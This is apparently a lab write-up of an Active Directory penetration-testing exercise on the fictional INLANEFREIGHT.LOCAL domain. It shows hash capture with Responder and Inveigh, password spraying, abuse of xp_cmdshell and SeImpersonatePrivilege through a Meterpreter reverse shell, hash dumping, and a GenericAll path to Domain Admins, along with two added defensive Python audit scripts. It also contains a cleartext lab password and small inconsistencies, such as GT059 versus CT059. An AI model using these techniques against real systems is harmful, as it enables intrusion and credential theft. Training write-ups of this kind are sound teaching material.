AD Enumeration & Attacks - Skills Assessment Part II
We already have SSH access to a Parrot Linux VM on the internal network, but no credentials. Our objective is to compromise the Active Directory domain by gaining access to it and obtaining the krbtgt hash.
Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain. What is the account name?
First I ran an Nmap scan and started Responder to capture any NTLM hashes:
nmap -T4 -A 172.16.6.0/23 -oN nmap_scan.txt &
responder -I ens24 &
While the scan ran, I determined the IP address of the domain controller using nslookup. Then I checked for SMB null sessions and anonymous rpcclient access, without success. Next I resorted to ldapsearch to gather information from LDAP. The Nmap scan results were as follows:
Nmap scan report for inlanefreight.local (172.16.7.3)
Host is up (0.040s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-18 21:44:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: INLANEFREIGHT.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: INLANEFREIGHT.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:c9:44 (VMware)
| smb2-time:
| date: 2024-03-18T21:44:06
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: -1s
Nmap scan report for 172.16.7.50
Host is up (0.040s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-03-18T21:44:16+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=MS01.INLANEFREIGHT.LOCAL
| Not valid before: 2024-03-17T21:40:47
|_Not valid after: 2024-09-16T21:40:47
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: MS01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:7c:72 (VMware)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-03-18T21:44:08
|_ start_date: N/A
Nmap scan report for 172.16.7.60
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-03-18T17:45:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-18T17:20:37
|_Not valid after: 2054-03-18T17:20:37
| ms-sql-ntlm-info:
| Target_Name: INLANEFREIGHT
| NetBIOS_Domain_Name: INLANEFREIGHT
| NetBIOS_Computer_Name: SQL01
| DNS_Domain_Name: INLANEFREIGHT.LOCAL
| DNS_Computer_Name: SQL01.INLANEFREIGHT.LOCAL
| DNS_Tree_Name: INLANEFREIGHT.LOCAL
|_ Product_Version: 10.0.17763
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: SQL01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:ce:a5 (VMware)
| ms-sql-info:
| Windows server name: SQL01
| 172.16.7.60\SQLEXPRESS:
| Instance name: SQLEXPRESS
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
| TCP port: 1433
|_ Clustered: false
| smb2-time:
| date: 2024-03-18T17:45:47
|_ start_date: N/A
So we have:
Domain Controller (DC) with IP address: 172.16.7.3
MS01 host with IP address: 172.16.7.50
SQL01 server with IP address: 172.16.7.60
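The host script results above already tell us something a defender should act on: the DC requires SMB signing, while MS01 and SQL01 only have it "enabled but not required". As an added example (not part of the original writeup), this Python snippet parses the Nmap output and lists the hosts that accept unsigned SMB sessions, which is the condition that lets captured NTLM authentications be relayed rather than merely cracked; the sample input is a trimmed copy of the scan above.

```python
"""Flag hosts whose Nmap smb2-security-mode result shows SMB signing is not required.

Added example, not from the original writeup: it parses the host script results
printed by the scan above; hosts accepting unsigned SMB sessions are the ones a
captured NTLM authentication could be relayed to."""
import re

# Constructed sample: trimmed copy of the three hosts from the scan above.
SAMPLE_NMAP = """\
Nmap scan report for inlanefreight.local (172.16.7.3)
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
Nmap scan report for 172.16.7.50
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
Nmap scan report for 172.16.7.60
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
"""

HOST_RE = re.compile(r"^Nmap scan report for (?P<name>\S+)(?: \((?P<ip>[\d.]+)\))?$")
SIGNING_RE = re.compile(r"^\|_?\s*Message signing (?P<status>.+)$")


def parse_smb_signing(nmap_text):
    """Map each host (IP if present, else name) to its SMB signing status string."""
    results, current = {}, None
    for line in nmap_text.splitlines():
        host = HOST_RE.match(line)
        if host:
            current = host.group("ip") or host.group("name")
            continue
        sig = SIGNING_RE.match(line)
        if sig and current:
            results[current] = sig.group("status").strip()
    return results


def relay_exposed_hosts(nmap_text):
    """Hosts where signing is anything other than 'enabled and required'."""
    return sorted(h for h, s in parse_smb_signing(nmap_text).items()
                  if s != "enabled and required")


if __name__ == "__main__":
    print("signing not enforced:", relay_exposed_hosts(SAMPLE_NMAP))
```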
After finishing the analysis I noticed that Responder, which we started at the beginning, had captured a user's hash. The hashes are saved in "/usr/share/responder/logs/SMB-NTLMv2-SSP-IpTarget". Now all we need to do is crack this NTLMv2 hash using hashcat.
WinRM is available on MS01, so we'll use Evil-WinRM; I prefer it over Impacket's wmiexec because it offers more features, such as upload and download capabilities.
evil-winrm -i 172.16.7.50 -u 'AB920' -p '<cracked_password>'
With that we got the flag.
Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.
I attempted several techniques here but none worked, so I reconsidered whether the question implies a password spray. Let's first check the lockout threshold to understand how many attempts we have before an account gets locked out.
*Evil-WinRM* PS C:\Users\AB920\Documents> net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 42
Minimum password length: 1
Length of password history maintained: None
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: SERVER
The command completed successfully.
The lockout threshold is "Never", so there is no limit on failed attempts and we can spray as often as we want. Let's pick a weak password and spray it across all user accounts. To obtain a list of domain users we can use the compromised user's credentials with the following command:
The passwords were discovered in the previous question using Kerbrute.
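The same `net accounts` output that told us spraying was safe is what a defender should be auditing. As an added example (not from the original writeup), this Python snippet parses that output and lists the policy weaknesses that make a spray cheap; the minimum-length baseline of 8 is an assumption chosen for illustration, not a value the writeup states.

```python
"""Audit `net accounts` output for settings that make password spraying cheap.
Added example, not from the original writeup; the min_length baseline is an assumption."""
import re

# Constructed sample: the `net accounts` output shown above, copied verbatim.
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 42
Minimum password length: 1
Length of password history maintained: None
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: SERVER
The command completed successfully.
"""

LINE_RE = re.compile(r"^(?P<key>[^:]+?):\s*(?P<value>.*)$")


def parse_net_accounts(text):
    """Return {setting: value}; numeric values become int, Never/None stay strings."""
    settings = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:  # e.g. "The command completed successfully."
            continue
        value = m.group("value").strip()
        settings[m.group("key").strip()] = int(value) if value.isdigit() else value
    return settings


def spray_exposure_findings(settings, min_length=8):
    """List the weaknesses relevant to spraying (min_length is an assumed baseline)."""
    findings = []
    if settings.get("Lockout threshold") == "Never":
        findings.append("lockout threshold Never: unlimited failed logons per account")
    length = settings.get("Minimum password length", 0)
    if isinstance(length, int) and length < min_length:
        findings.append(f"minimum password length {length} is below {min_length}")
    if settings.get("Length of password history maintained") == "None":
        findings.append("no password history: users can reuse old passwords")
    return findings


if __name__ == "__main__":
    for finding in spray_exposure_findings(parse_net_accounts(SAMPLE_NET_ACCOUNTS)):
        print("[!]", finding)
```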
Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?
I used the credentials of the user "BR086" to enumerate the network shares; for this task I employed my favorite tool, smbmap.
smbmap -u BR086 -p Welcome1 -H 172.16.7.3
[+] IP: 172.16.7.3:445 Name: inlanefreight.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Department Shares READ ONLY Share for department users
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
So let's enumerate each directory. To keep things simple I continue using the same tool, which is why I prefer it. I'll start with the 'netlogon' directory.
I discovered a suspicious file named 'web.config' in the 'netlogon' directory. After downloading it I found a user's credentials inside. You can download the file with any command you prefer; as always, I used smbmap for this task.
smbmap -u BR086 -p Welcome1 -R 'Department Shares' -H 172.16.7.3 -A web.config -q
Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
I authenticated to MSSQL with the obtained credentials using Impacket's mssqlclient.py:
mssqlclient.py INLANEFREIGHT/netdb@172.16.7.60
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SQL01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
SQL> enable_xp_cmdshell
Then I ran "whoami /priv" and found these juicy privileges:
SQL> xp_cmdshell "whoami /priv"
output
--------------------------------------------------------------------------------
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
NULL
We know that the "SeImpersonatePrivilege" privilege can be abused with various exploits. In my case I exploited it using printSpooler to obtain a shell as "nt authority\system". To do this I generated a reverse TCP shell with msfvenom using the following command:
I used Meterpreter to make transferring files and dumping hashes easier (with the 'include' option), and I transferred the 'printSpooler.exe' and 'shell.exe' files to the target machine "SQL01" using the following command:
[*] Started reverse TCP handler on 172.16.7.240:4444
[*] Sending stage (200262 bytes) to 172.16.7.60
[*] Meterpreter session 1 opened (172.16.7.240:4444 -> 172.16.7.60:56938 ) at 2024-03-18 14:30:56 -0400
meterpreter > shell
Process 5580 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.2628]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
From here you can read the flag.
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
Here I simply dumped the hashes with Meterpreter's 'hashdump' command, which gave me the Administrator hash.
Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?
I ran SharpHound:
.\SharpHound.exe -c ALL --zipfilename enum
Then I downloaded the archive to my Kali machine and extracted it to use the GUI version of BloodHound, where I selected 'Find Shortest Paths to Domain Admins'.
So the answer is the user "GT059".
Crack this user's password hash and submit the cleartext password as your answer.
Here I attempted to use Mimikatz to extract credentials from memory, but it did not work. Then I recalled 'Inveigh.exe', which works similarly to Responder on Linux, so I uploaded it to MS01.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> upload Inveigh.exe
Info: Uploading Inveigh.exe to C:\Users\Administrator\Desktop\Inveigh.exe
Let's capture some NTLM hashes:
.\Inveigh.exe
Boom, we captured the NTLMv2 hash of the user "CT059"; now we just need to crack it.
Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.
So we need to add a compromised user whose credentials we have to the Domain Admins group using the 'GenericAll' right. In my case I will add the user 'AB920', since I still have a session on the SQL01.inlanefreight host. You can execute these commands on the MS01 host as well; it works the same way.